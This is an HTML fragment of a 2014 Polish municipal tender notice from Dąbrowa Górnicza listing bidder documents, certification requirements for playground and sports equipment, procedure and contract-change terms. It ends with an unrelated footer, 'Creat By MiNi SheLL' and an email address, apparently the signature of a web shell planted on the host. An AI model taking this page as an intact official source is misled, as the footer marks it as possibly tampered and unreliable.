<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy przedłożyć:
1. Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania) - dotyczy zadania A i (-lub) zadania B i (-lub) zadania C i (-lub) zadania D i (-lub) zadania E.
2. Formularz cenowy - załącznik nr 1 A, 1B, 1C, 1D, 1E do SIWZ (wskazana data podpisania) - dotyczy zadania A i (-lub) zadania B i (-lub) zadania C i (-lub) zadania D i (-lub) zadania E.
3. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej) - dotyczy zadania A i (-lub) zadania B i (-lub) zadania C i (-lub) zadania D i (-lub) zadania E.
4.w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b ustawy - dotyczy zadania A i (-lub) zadania B i (-lub) zadania C i (-lub) zadania D i (-lub) zadania E.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1 w zakresie zmiany terminu wykonania zamówienia, na skutek siły wyższej co oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
2. W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1. zmian przepisów prawa istotnych dla postanowień zawartej umowy.
2.2. zmiany podatku VAT na skutek zmian w przepisach prawnych:
a) w przypadku zwiększenia stawki podatku VAT- wartość wynagrodzenia brutto nie ulegnie zmianie w okresie obowiązywania umowy.
b) w przypadku zmniejszenia stawki podatku VAT - wartość wynagrodzenia brutto zostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT.
2.3. zmiany podwykonawców lub zmiany podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany publiczne dotychczasowy podwykonawca,
3. W przypadku wystąpienia wyżej wymienionych okoliczności strony poinformują się natychmiast o ich zaistnieniu.
4. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
5.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
6. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 8/1, i (-lub) 8/2, i (-lub) 8/3, i (-lub) 8/4 i (-lub) 8/5 do SIWZ - projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w
Dąbrowie Górniczej 41-300 Dąbrowa Górnicza, ul. Graniczna 21 Wydział Gospodarki Komunalnej
i Mieszkaniowej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2014 godzina 12:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter
stanowisko nr 13 - INFORMACJA..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie jest finansowane z Unii Europejskiej. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udział            w postępowaniu określone w pkt. 8 SIWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie          z zapisami zawartymi w pkt. 9 SIWZ.
 W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.2. i 9.3. SIWZ podpisane przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Oświadczenie wymienione w pkt. 9.1.1. SIWZ, dokumenty wymienione w pkt. 9.1.2. i 9.1.3. SIWZ, Formularz ofertowy wymieniony w pkt. 9.5.1. oraz Formularze cenowe, o których mowa w pkt. 9.5.2.  SIWZ składają wszyscy Wykonawcy wspólnie lub pełnomocnik w imieniu wszystkich Wykonawców. Dokumenty wymienione w pkt. 9.4. SIWZ Wykonawcy składają wspólnie.
. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. Uszczegółowienie sekcji III.5 niniejszego ogłoszenia: zaświadczenia niezależnego podmiotu
uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają normom
lub specyfikacjom technicznym, tj.: - w przypadku urządzeń zabawowych - aktualny certyfikat zgodności z normą PN-EN 1176 lub dokument równoważny, - w przypadku urządzeń sportowych -
aktualne certyfikaty zgodności z normami PN-EN 1176 oraz PN-EN 957 lub dokument
równoważny.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com